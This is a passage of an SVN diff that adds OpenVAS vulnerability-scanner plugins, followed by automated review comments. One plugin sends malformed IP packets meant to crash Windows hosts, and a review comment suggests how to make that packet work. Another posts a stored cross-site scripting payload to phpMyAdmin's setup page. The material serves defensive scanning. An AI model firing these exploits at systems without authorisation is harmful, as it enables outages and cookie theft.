+if(!chromeVer){
+  exit(0);
+}
+
+## Check for Google Chrome Versions prior to 15.0.874.121
+if(version_is_less(version:chromeVer, test_version:"15.0.874.121")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Added: trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,136 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_ms_windows_ip_validation_code_exec_vuln.nasl 18523 2011-11-21 15:15:15Z nov $
+#
+# Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902588);
+  script_version("$Revision$");
+  script_cve_id("CVE-2005-0048");
+  script_bugtraq_id(13116);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-21 15:15:15 +0530 (Mon, 21 Nov 2011)");
+  script_name("Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability");
+  desc = "
+  Overview: The host is running Microsoft Windows and is prone to remote code
+  execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to insufficient validation of IP options and can be
+  exploited to cause a vulnerable system to stop responding and restart or may
+  allow execution of arbitrary code by sending a specially crafted IP packet
+  to a vulnerable system.
+
+  Impact:
+  Successful exploitation will let the attacker to cause a denial of service
+  and possibly execute arbitrary code via crafted IP packets with malformed
+  options.
+
+  Impact Level: System
+
+  Affected Software/OS:
+  Microsoft Windows XP SP2 and prior.
+  Microsoft Windows 2000 Server SP4 and prior.
+
+  Run Windows Update and update the listed hotfixes or download and
+  update mentioned hotfixes in the advisory from the below link,
+  http://technet.microsoft.com/en-us/security/bulletin/ms05-019
+
+  References:
+  http://secunia.com/advisories/14512
+  http://securitytracker.com/id/1013686
+  http://technet.microsoft.com/en-us/security/bulletin/ms05-019 ";
+
+  script_description(desc);
+  script_summary("Determine Internet Protocol Validation Remote Code Execution Vulnerability");
+  script_category(ACT_KILL_HOST);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Windows : Microsoft Bulletins");
+  script_require_ports(139, 445);
+  exit(0);
+}
+
+
+include("smb_nt.inc");
+
+if(TARGET_IS_IPV6()){
+  exit(0);
+}
+
+## Get SMB Port
+port = kb_smb_transport();
+if(!port) {
+  port = 445;
+}
+
+## Check Port State
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+## Building Exploit
+dstaddr = get_host_ip();
+srcaddr = this_host();
+sport = rand() % (65536 - 1024) + 1024;
+
+## IP packet with an option size 39
+options = raw_string(0x03, 0x27, crap(data:"G", length:38));
+
+ip = forge_ip_packet( ip_v   : 4,
+                      ip_hl  : 15,
+                      ip_tos : 0,
+                      ip_len : 20,
+                      ip_id  : rand(),
+                      ip_p   : IPPROTO_TCP,
+                      ip_ttl : 64,
+                      ip_off : 0,
+                      ip_src : srcaddr,
+                      data   : options );
+
+
+tcp = forge_tcp_packet( ip       : ip,
+                        th_sport : sport,
+                        th_dport : port,
+                        th_flags : TH_SYN,
+                        th_seq   : rand(),
+                        th_ack   : 0,
+                        th_x2    : 0,
+                        th_off   : 5,
+                        th_win   : 512,
+                        th_urp   : 0 );
+
+## Sending Exploit
+start_denial();
+for( i = 0; i < 5 ; i ++ ) {
+  result = send_packet(tcp,pcap_active:FALSE);
+}
+alive = end_denial();
+
+## Confirm Host is Still Alive and Responding
+if(! alive) {
+  security_hole(port);
+}
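Review bot: The IP header forged at lines 911-920 is self-contradictory: `ip_hl : 15` declares a 60-byte header (20 bytes plus the 40-byte `options` string) while `ip_len : 20` declares a total length smaller than the header itself, so unless forge_ip_packet/forge_tcp_packet overwrite the total length from the appended data (not confirmable from here) the target stack presumably drops the datagram on its length sanity check before the options are ever parsed, and `end_denial()` then always reports the host alive. Either set `ip_len : 60` so the total covers header plus options (forge_tcp_packet adding the segment on top), or omit `ip_len` and let the forgery functions fill it in; whichever is chosen, it is worth a comment such as `# total length must cover the 40-byte option block, otherwise the packet is rejected before option parsing`. `dstaddr` (line 904) and `result` (line 937) are assigned but never read; pass `ip_dst : dstaddr` to forge_ip_packet or drop both. Since this is an ACT_KILL_HOST probe that can reboot the target, consider gating it on a Windows 2000/XP fingerprint from the KB rather than on any host with a reachable SMB port, so the crash attempt is not sent to hosts the bulletin does not cover.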


Property changes on: trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Added: trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,172 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_phpmyadmin_setup_interface_xss_vuln.nasl 18295 2011-11-22 17:17:17Z nov $
+#
+# phpMyAdmin Setup Interface Cross Site Scripting Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902585);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-4064");
+  script_bugtraq_id(50175);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-22 17:17:17 +0530 (Tue, 22 Nov 2011)");
+  script_name("phpMyAdmin Setup Interface Cross Site Scripting Vulnerability");
+  desc = "
+  Overview: The host is running phpMyAdmin and is prone to cross-site scripting
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to improper validation of user-supplied input
+  via the 'Servers-0-verbose' parameter to setup/index.php, which allows
+  attackers to execute arbitrary HTML and script code in a user's browser
+  session in the context of an affected site.
+
+  Impact:
+  Successful exploitation will allow remote attackers to insert arbitrary HTML
+  and script code, which will be executed in a user's browser session in the
+  context of an affected site.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  phpMyAdmin versions 3.4.x before 3.4.6
+
+  Fix: Upgrade to phpMyAdmin version 3.4.6 or later,
+  For updates refer, http://www.phpmyadmin.net/home_page/downloads.php
+
+  References:
+  http://osvdb.org/show/osvdb/76711
+  http://secunia.com/advisories/46431
+  http://securitytracker.com/id/1026199
+  http://xforce.iss.net/xforce/xfdb/70681
+  http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php
+  http://hauntit.blogspot.com/2011/09/stored-xss-in-phpmyadmin-345-all.html ";
+
+  script_description(desc);
+  script_summary("Check if phpMyAdmin is vulnerable to Cross-Site Scripting");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_dependencies("secpod_phpmyadmin_detect_900129.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+## Get phpMyAdmin Location
+if(!dir = get_dir_from_kb(port:port, app:"phpMyAdmin")){
+  exit(0);
+}
+
+## Send and Receive the response
+url = "/setup/index.php?tab_hash=&check_page_refresh=1&page=servers&mode=" +
+      "add&submit=New+server";
+req = http_get(item:dir+url,  port:port);
+res = http_keepalive_send_recv(port:port, data:req);
+
+## Get Session ID
+cookie = eregmatch(pattern:"Set-Cookie: ([^;]*);", string:res);
+if(isnull(cookie[1])) {
+  exit(0);
+}
+cookie = cookie[1];
+
+## Get Token
+token = eregmatch(pattern:'name="token" value="([a-zA-Z0-9]+)"', string:res);
+if(isnull(token[1])) {
+  exit(0);
+}
+token = token[1];
+
+## Construct attack request
+data = string("tab_hash=&check_page_refresh=1&token=", token, "&Servers-0-",
+              "verbose=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E",
+              "&Servers-0-host=localhost&Servers-0-port=&Servers-0-socket=&S",
+              "ervers-0-connect_type=tcp&Servers-0-extension=mysqli&submit_s",
+              "ave=Save&Servers-0-auth_type=cookie&Servers-0-user=root&Serve",
+              "rs-0-password=&Servers-0-auth_swekey_config=&Servers-0-auth_h",
+              "ttp_realm=&Servers-0-SignonSession=&Servers-0-SignonURL=&Serv",
+              "ers-0-LogoutURL=&Servers-0-only_db=&Servers-0-only_db-userpre",
+              "fs-allow=on&Servers-0-hide_db=&Servers-0-hide_db-userprefs-al",
+              "low=on&Servers-0-AllowRoot=on&Servers-0-DisableIS=on&Servers-",
+              "0-AllowDeny-order=&Servers-0-AllowDeny-rules=&Servers-0-ShowD",
+              "atabasesCommand=SHOW+DATABASES&Servers-0-pmadb=&Servers-0-con",
+              "troluser=&Servers-0-controlpass=&Servers-0-verbose_check=on&S",
+              "ervers-0-bookmarktable=&Servers-0-relation=&Servers-0-usercon",
+              "fig=&Servers-0-table_info=&Servers-0-column_info=&Servers-0-h",
+              "istory=&Servers-0-tracking=&Servers-0-table_coords=&Servers-0",
+              "-pdf_pages=&Servers-0-designer_coords=&Servers-0-tracking_def",
+              "ault_statements=CREATE+TABLE%2CALTER+TABLE%2CDROP+TABLE%2CREN",
+              "AME+TABLE%2CCREATE+INDEX%2CDROP+INDEX%2CINSERT%2CUPDATE%2CDEL",
+              "ETE%2CTRUNCATE%2CREPLACE%2CCREATE+VIEW%2CALTER+VIEW%2CDROP+VI",
+              "EW%2CCREATE+DATABASE%2CALTER+DATABASE%2CDROP+DATABASE&Servers",
+              "-0-tracking_add_drop_view=on&Servers-0-tracking_add_drop_tabl",
+              "e=on&Servers-0-tracking_add_drop_database=on");
+
+url = string(dir, '/setup/index.php?tab_hash=&check_page_refresh=1',
+             '&token=', token, '&page=servers&mode=add&submit=New+server');
+
+req = string("POST ", url, " HTTP/1.1\r\n",
+             "Host: ", get_host_name(), "\r\n",
+             "User-Agent: OpenVAS\r\n",
+             "Cookie: ", cookie, "\r\n",
+             "Content-Type: application/x-www-form-urlencoded\r\n",
+             "Content-Length: ", strlen(data), "\r\n\r\n", data);
+
+## Send crafted POST request and receive the response
+res = http_keepalive_send_recv(port:port, data:req);
+
+## Confirm exploit
+if(res =~ "HTTP/1.. 30")
+{
+  ## Send request and receive the response
+  req = http_get(item:string(dir,"/setup/index.php"), port:port);
+  req = string(chomp(req), '\r\nCookie: ', cookie, '\r\n\r\n');
+  res = http_keepalive_send_recv(port:port, data:req);
+
+  ## Confirm exploit worked by checking the response
+  if("Use SSL (<script>alert(document.cookie)</script>)" >< res){
+    security_warning(port);
+  }
+}
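Review bot: The cookie handling at lines 1065-1069 keeps only the first `Set-Cookie` header of the setup page, so if the server emits several cookies and the session cookie is not first, the token obtained at line 1072 belongs to a session the POST never presents, the 3xx at line 1117 is not seen and the check silently exits without a finding; collect every `Set-Cookie:` line (e.g. with `egrep()`), join their `name=value` parts with `"; "`, and send that string in both requests. The request at lines 1106-1111 also omits the port from the `Host:` header, which can matter on name-based virtual hosts running phpMyAdmin on a non-default port; `get_host_name() + ":" + port` is the safer form. `include("version_func.inc")` at line 1037 is unused in this script and can go. Finally, the POST deliberately stores a `<script>` payload in the target's setup session; a short comment stating that this state is confined to the scanner's own session cookie and is not written to config.inc.php would save the next reader from re-auditing the side effect.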


Property changes on: trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date


